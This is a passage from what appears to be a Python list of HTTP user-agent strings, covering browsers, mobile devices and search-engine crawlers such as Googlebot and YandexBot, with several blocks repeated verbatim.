'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
